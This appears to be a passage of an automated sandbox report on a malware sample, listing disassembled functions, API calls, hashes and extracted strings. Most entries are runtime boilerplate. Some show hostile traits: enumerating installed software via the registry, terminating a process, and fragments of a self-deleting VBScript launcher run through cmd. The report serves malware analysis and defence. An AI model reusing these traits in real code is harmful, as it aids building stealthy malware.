                                                                                                                                                                                          • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                          • API String ID: 4218353326-230879103
                                                                                                                                                                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                          • Instruction ID: 6abd7122bab287562c8caae9ecc3c0f731cb59c75c3f39c77b2c9c4cb12392d4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 16715AB5D012689BDF12DBB48C88ADF7BFC9F15248F3800A6D644E7241E634E785CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005E20A8 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 005E20E1
                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 005E20EC
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E1301
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E1313
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E1325
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E1337
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E1349
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E135B
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E136D
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E137F
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E1391
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E13A3
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E13B5
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E13C7
                                                                                                                                                                                            • Part of subcall function 005E12E4: _free.LIBCMT ref: 005E13D9
                                                                                                                                                                                          • _free.LIBCMT ref: 005E2103
                                                                                                                                                                                          • _free.LIBCMT ref: 005E2118
                                                                                                                                                                                          • _free.LIBCMT ref: 005E2123
                                                                                                                                                                                          • _free.LIBCMT ref: 005E2145
                                                                                                                                                                                          • _free.LIBCMT ref: 005E2158
                                                                                                                                                                                          • _free.LIBCMT ref: 005E2166
                                                                                                                                                                                          • _free.LIBCMT ref: 005E2171
                                                                                                                                                                                          • _free.LIBCMT ref: 005E21A9
                                                                                                                                                                                          • _free.LIBCMT ref: 005E21B0
                                                                                                                                                                                          • _free.LIBCMT ref: 005E21CD
                                                                                                                                                                                          • _free.LIBCMT ref: 005E21E5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$___free_lconv_mon
                                                                                                                                                                                          • String ID: {-Y
                                                                                                                                                                                          • API String ID: 3658870901-2507730204
                                                                                                                                                                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                                          • Instruction ID: 34bdb5e0b08a1299267ba867f448d25e9e147060f7045b699592811197840f72
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60318E32504346DFDB399B3AE809B5A7BE8FB44310F14845BE588C7251EE30AA80CA15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 1234C6B1
                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 1234C6F5
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1234C9BF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEnumOpen
                                                                                                                                                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                                                                          • API String ID: 1332880857-3714951968
                                                                                                                                                                                          • Opcode ID: fd5e4d681d52087b1afcd1d95d589394e7ee2d523ccb08fa54279759c478f94d
                                                                                                                                                                                          • Instruction ID: e7c2289b7bea4ee1400fc0c45d248ee15b7157958093b5662c0a208cb4b87265
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd5e4d681d52087b1afcd1d95d589394e7ee2d523ccb08fa54279759c478f94d
                                                                                                                                                                                          • Instruction Fuzzy Hash: C581FA761083859BD376DB10D890EFFB7E8BF94305F504A2DE58A83150EF34AA49CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005E020F Relevance: 22.9, APIs: 15, Instructions: 419COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$_wcschr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 565560161-0
                                                                                                                                                                                          • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                                                                                                                                          • Instruction ID: 19898082a1f98bed5a5a5c0874f508314217be3d7ebbb75180ec5fbfa3cb8ff8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                                                                                                                                          • Instruction Fuzzy Hash: C3D13671D00341AFDB38AF7AD949A6E7FA4BF05320F04556FEA84A73C1E6B189808B51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402E8C Relevance: 22.7, Strings: 18, Instructions: 215COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (dscPtr->xdMask & TM_IS_PTR) == 0$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$dscPtr->xdArgCopy == 0$dscPtr->xdERRaddr == errPtr$dscPtr->xdHtabAdr == hdtPtr$dscPtr->xdMask & TM_IS_PTR$dscPtr->xdSize == size$dscPtr->xdTypeID == dscPtr->xdBase$hdtPtr->HDcctrAddr$mask & TM_IS_PTR
                                                                                                                                                                                          • API String ID: 0-1891739981
                                                                                                                                                                                          • Opcode ID: 969f67ffcb5067673063e64fe3796bacbba4f129e949b1f3920271b5ca9efc58
                                                                                                                                                                                          • Instruction ID: b0be35119990f9db5c9be0669567bd5358c9fa87076fb98632e1a2023bb73427
                                                                                                                                                                                          • Opcode Fuzzy Hash: 969f67ffcb5067673063e64fe3796bacbba4f129e949b1f3920271b5ca9efc58
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8481D471D00204BBDB14CF40CD8AB9A7FB5AF64304F1440BAED443A2D6E7BE9A54DB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D6B38 Relevance: 21.3, APIs: 14, Instructions: 296COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                                                                                                                                                          • Instruction ID: 32107e399c442d431b17f08ea8fc09fa920db9921090263b4ef1c3f31102ad3f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 27B19D719003069FDB20DF68C885BAEBBF9FF48300F14406BE499A7352D775A946CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403CF0 Relevance: 20.3, Strings: 16, Instructions: 317COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • dttPtr->dttType->tpMask & TM_IS_PTR, xrefs: 00403D5E
                                                                                                                                                                                          • varType->tpClass.tpcFlags & CF_HAS_DTOR, xrefs: 00403E67
                                                                                                                                                                                          • XX.CPP, xrefs: 00403ECC
                                                                                                                                                                                          • XX.CPP, xrefs: 00403F29
                                                                                                                                                                                          • XX.CPP, xrefs: 00403DC2
                                                                                                                                                                                          • XX.CPP, xrefs: 00403FAD
                                                                                                                                                                                          • dttPtr->dttFlags & (DTCVF_PTRVAL|DTCVF_RETVAL), xrefs: 00403D3C
                                                                                                                                                                                          • elemType->tpClass.tpcFlags & CF_HAS_DTOR, xrefs: 00403ED1
                                                                                                                                                                                          • IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR), xrefs: 00403DC7
                                                                                                                                                                                          • XX.CPP, xrefs: 00403D7E
                                                                                                                                                                                          • XX.CPP, xrefs: 00403D37
                                                                                                                                                                                          • dtCnt >= 0, xrefs: 00403FB2
                                                                                                                                                                                          • XX.CPP, xrefs: 00403D59
                                                                                                                                                                                          • varType->tpMask & TM_IS_PTR, xrefs: 00403F2E
                                                                                                                                                                                          • dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR, xrefs: 00403D83
                                                                                                                                                                                          • XX.CPP, xrefs: 00403E62
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$dtCnt >= 0$dttPtr->dttFlags & (DTCVF_PTRVAL|DTCVF_RETVAL)$dttPtr->dttType->tpMask & TM_IS_PTR$dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR$elemType->tpClass.tpcFlags & CF_HAS_DTOR$varType->tpClass.tpcFlags & CF_HAS_DTOR$varType->tpMask & TM_IS_PTR
                                                                                                                                                                                          • API String ID: 0-1768441193
                                                                                                                                                                                          • Opcode ID: 4acfe1481d98f6b053f88c73a38a3bcd134e0db91d14c5b2a59e664249bb3ef2
                                                                                                                                                                                          • Instruction ID: caf5c84f2d173a05e078e6a7eb0dc506ced428132af286e1606af20b9f92d0a8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4acfe1481d98f6b053f88c73a38a3bcd134e0db91d14c5b2a59e664249bb3ef2
                                                                                                                                                                                          • Instruction Fuzzy Hash: E4D18171E002099FDB04CF54C845BAEBFB5AF44314F1885AAEA457B3D2C3799D91CB89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14647CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 14647D06
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 146490D7
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 146490E9
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 146490FB
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 1464910D
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 1464911F
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 14649131
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 14649143
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 14649155
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 14649167
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 14649179
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 1464918B
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 1464919D
                                                                                                                                                                                            • Part of subcall function 146490BA: _free.LIBCMT ref: 146491AF
                                                                                                                                                                                          • _free.LIBCMT ref: 14647CFB
                                                                                                                                                                                            • Part of subcall function 1464571E: HeapFree.KERNEL32(00000000,00000000,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?), ref: 14645734
                                                                                                                                                                                            • Part of subcall function 1464571E: GetLastError.KERNEL32(?,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?,?), ref: 14645746
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D1D
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D32
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D3D
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D5F
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D72
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D80
                                                                                                                                                                                          • _free.LIBCMT ref: 14647D8B
                                                                                                                                                                                          • _free.LIBCMT ref: 14647DC3
                                                                                                                                                                                          • _free.LIBCMT ref: 14647DCA
                                                                                                                                                                                          • _free.LIBCMT ref: 14647DE7
                                                                                                                                                                                          • _free.LIBCMT ref: 14647DFF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                          • Opcode ID: 5eefc3bfaceb53b35bf337774b3e85d6d0debe1572487c9785ef6be5db5587fb
                                                                                                                                                                                          • Instruction ID: 043c9089dcf2c8a651dbc88f00da8da6807279716be67812734449a61f3b61e0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eefc3bfaceb53b35bf337774b3e85d6d0debe1572487c9785ef6be5db5587fb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E318F31611245DFEF229B38D840B66BBE9EF2021DF39442BE949D7651DE39F880CB18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123812C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 1238130A
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 1238051F
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 12380531
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 12380543
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 12380555
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 12380567
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 12380579
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 1238058B
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 1238059D
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 123805AF
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 123805C1
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 123805D3
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 123805E5
                                                                                                                                                                                            • Part of subcall function 12380502: _free.LIBCMT ref: 123805F7
                                                                                                                                                                                          • _free.LIBCMT ref: 123812FF
                                                                                                                                                                                            • Part of subcall function 12376782: RtlFreeHeap.NTDLL(00000000,00000000,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?), ref: 12376798
                                                                                                                                                                                            • Part of subcall function 12376782: GetLastError.KERNEL32(?,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?,?), ref: 123767AA
                                                                                                                                                                                          • _free.LIBCMT ref: 12381321
                                                                                                                                                                                          • _free.LIBCMT ref: 12381336
                                                                                                                                                                                          • _free.LIBCMT ref: 12381341
                                                                                                                                                                                          • _free.LIBCMT ref: 12381363
                                                                                                                                                                                          • _free.LIBCMT ref: 12381376
                                                                                                                                                                                          • _free.LIBCMT ref: 12381384
                                                                                                                                                                                          • _free.LIBCMT ref: 1238138F
                                                                                                                                                                                          • _free.LIBCMT ref: 123813C7
                                                                                                                                                                                          • _free.LIBCMT ref: 123813CE
                                                                                                                                                                                          • _free.LIBCMT ref: 123813EB
                                                                                                                                                                                          • _free.LIBCMT ref: 12381403
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                          • Opcode ID: d1c232a5e105c50b64f1f14b8965ff2b4e2fd8ea295d90f08443632446ef1733
                                                                                                                                                                                          • Instruction ID: 2cf2ac235a0be6ecf7b707952adbdd24e0f391734ff302e52007910b133f6ca3
                                                                                                                                                                                          • Opcode Fuzzy Hash: d1c232a5e105c50b64f1f14b8965ff2b4e2fd8ea295d90f08443632446ef1733
                                                                                                                                                                                          • Instruction Fuzzy Hash: D1315B376003429FEF618E39D844BAAB7E8EF00355F508719E4A9DB550DBB4FE80AB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005E13E2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                                                                                          • Instruction ID: 9a7b15480de923ac119c52a58efeeffc2b49b486bc786284624e60808491fda7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                                                                                          • Instruction Fuzzy Hash: BBC144B2E40249BFDB24DBA9CC4AF9E7BF8AF48700F154155FA44FB282D6709E418B54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12380600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: 34cca50c01e418f6f2dde033ad17383b0ed3adbea409df2de9947d109e0ebe25
                                                                                                                                                                                          • Instruction ID: 58ceff5e268c914a97f163e098ac4c176e75af0bc6b5fe2cdf4ff2c4dd50e379
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34cca50c01e418f6f2dde033ad17383b0ed3adbea409df2de9947d109e0ebe25
                                                                                                                                                                                          • Instruction Fuzzy Hash: DBC15477D40245AFDB60CBA8CC81FEEB7F8AF09700F144265FA45EB281D674AD419BA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233D7FF Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 12342850: TerminateProcess.KERNEL32(00000000,pth_unenc,1233F8C8), ref: 12342860
                                                                                                                                                                                            • Part of subcall function 12342850: WaitForSingleObject.KERNEL32(000000FF), ref: 12342873
                                                                                                                                                                                            • Part of subcall function 123436F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,123A52F0), ref: 12343714
                                                                                                                                                                                            • Part of subcall function 123436F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 1234372D
                                                                                                                                                                                            • Part of subcall function 123436F8: RegCloseKey.KERNEL32(00000000), ref: 12343738
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 1233D859
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,12396468,12396468,00000000), ref: 1233D9B8
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 1233D9C4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                                          • API String ID: 1913171305-2411266221
                                                                                                                                                                                          • Opcode ID: 10edb2dda751f2d8b7ca83e798996862cf9356168f1b4c3b83e1a4e03bf38930
                                                                                                                                                                                          • Instruction ID: e3a984a3f43fc2dbd4aec69224f0ff9c392ea8e80a4dd0566f336198b43d8d4c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 10edb2dda751f2d8b7ca83e798996862cf9356168f1b4c3b83e1a4e03bf38930
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C41813BD101185ADBAAE764DC94DFEB779AF51302F004269E00AE3194FF247F4ACA90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040333C Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 298COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • @__lockDebuggerData$qv.WKRRIUHD ref: 0040340C
                                                                                                                                                                                          • @__unlockDebuggerData$qv.WKRRIUHD ref: 00403465
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • !"bogus context in _ExceptionHandler()", xrefs: 00403750
                                                                                                                                                                                          • bogus context in _ExceptionHandler(), xrefs: 0040373D
                                                                                                                                                                                          • XX.CPP, xrefs: 0040374B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
